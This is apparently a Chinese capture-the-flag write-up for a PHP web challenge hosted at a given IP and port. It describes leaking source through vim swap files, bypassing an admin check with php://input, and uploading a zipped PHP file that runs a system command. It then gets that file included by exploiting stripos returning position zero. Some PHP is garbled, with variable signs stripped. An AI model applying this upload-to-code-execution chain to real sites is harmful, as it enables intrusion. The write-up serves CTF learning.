工控云管理系统客服中心期待您的反馈
工控云管理系统客服中心存在漏洞,flag就在flag/flag/flag/flag/flag/flag/flag.php文件里面 http://47.104.188.226:20001 请找到这个隐藏的文件,swp?不不不。。。再找找。。
emmmm,这个题也是源码泄漏…
以后拿到题目没思路先把可能泄漏源码的地方试一遍再说….
http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn
PHPCopy
这里就是源码泄漏,然后拿到index的源码
PHPCopy
里面有一个文件下载的函数,只有通过了认证才可以下载,然后认证的部分是
if(isset(adfile) && file_get_contents(adfile, ‘r’) === ‘Yeah Everything Will Be Ok My Boss’) {
echo “Welcome ! You Are Administrator !”;
$cert = ‘Y’;
}
PHPCopy
这里绕过直接用php://input就可以了,然后通过file参数来下载upload.php
顺利拿到upload.php的源码
<?php if (stripos(_SERVER['QUERY_STRING'], 'flag') > 0) { die('no flag flag flag flag !'); } if (!empty(_FILES)) { //properties of the uploaded file name= _FILES["filename"]["name"]; type= _FILES["filename"]["type"]; size= _FILES["filename"]["size"]; temp= _FILES["filename"]["tmp_name"]; error= _FILES["filename"]["error"]; if (strlen(name) >= 6) { die('name is too long !'); } if (stripos(name, './') > 0) { die('invalid parameter'); } if (stripos(name, 'php') > 0) { die('invalid parameter'); } if (substr(name, -3, 3) !== 'zip' && substr(name, -3, 3) !== 'jpg' && substr(name, -3, 3) !== 'png') { die('file can not upload ! '); } if (error > 0) die("Error uploading file! code error."); else { if(type !== "application/zip" || size > 400)//condition for the file { die("Format not allowed or file size too big!"); } else { if(file_exists('includes')){ move_uploaded_file(temp, "includes/uploaded/" .name); echo "Upload complete a!"; shell_exec('sh /var/www/html/includes/unzip.sh'); }elseif(file_exists('uploaded')){ move_uploaded_file(temp, "uploaded/" .name); echo "Upload complete!"; shell_exec('sh /var/www/html/includes/unzip.sh'); } } } }else{ if(isset(_GET['step']) && strlen(_GET['step']) === 20) { if (stripos(_GET['step'], 'lag') > 0) { die('error'); } if (stripos(_GET['step'], './') > 0) { die('error'); } if (stripos(_GET['step'], ' ') > 0) { die('error'); } if (stripos(_GET['step'], '/') > 0) { die('error'); } if (preg_match('/[^\w\d_ -]/si', _GET['step'])) { _GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', _GET['step']); die('error'); } passthru('cat ' . 'uploaded/' . _GET['step']); }else{ die(); } } ?>PHPCopy
看一下源码,balabala一大堆,发现就是可以上传一个zip文件嘛,然后名字不能太长,传上去之后会调用一个unzip.sh,访问一下http://47.104.188.226:20001/includes/unzip.sh
拿到了unzip.sh的源码
#/bin/bash
cd ./uploaded
find ./ -size +1M | xargs rm
cd …/
unzip -o ./uploaded/.zip -d ./uploaded/
rm -rf ./uploaded/.zip
rm -rf ./uploaded/.
rm -rf ./uploaded/.*
cd ./uploaded
find -type d | xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php
PHPCopy
这个脚本会删除带.的文件而且会删除目录文件,最后创建一个index.php,但不给权限
那我们创建一个123,里面写一个
<?php system('cat flag/flag/flag/flag/flag/flag/flag.php'); ?>PHPCopy
压缩成1.zip,上传,抓包改type为application/zip,然后上传和解压成功,之后就是包含这个文件拿flag了,index里面有包含的部分,但是那里对upload进行了检测
function autoload(page) { if (stripos(_SERVER[‘QUERY_STRING’], ‘flag’) > 0) {
die(‘no flag flag flag flag !’);
}
if (stripos(_SERVER[‘QUERY_STRING’], ‘uploaded’) > 0) { die(‘no uploaded uploaded uploaded uploaded !’); } if (stripos(_SERVER[‘QUERY_STRING’], ‘?/f’) > 0) {
die(‘no ?/f ?/f ?/f’);
}
if (stripos(_SERVER[‘QUERY_STRING’], ‘ata’) > 0) { die(‘no ata ata ata’); } if (stripos(_SERVER[‘QUERY_STRING’], ‘0’) > 0) {
die(‘no 0 0 0’);
}
if(file_exists("./includes/page.php")) { include “./includes/page.php”;
}
elseif(file_exists("./includes/page")) { include “./includes/page”;
}else{
echo "File is not exit ";
}
}
PHPCopy
这里用的是stripos,这个函数返回的是字符串第一次被匹配到的位置,但注意,字符串是从0开始记的,所以我们构造一个http://47.104.188.226:20001/index.php?uploaded&page=uploaded/123
那么就可以绕过了,包含之后拿到flag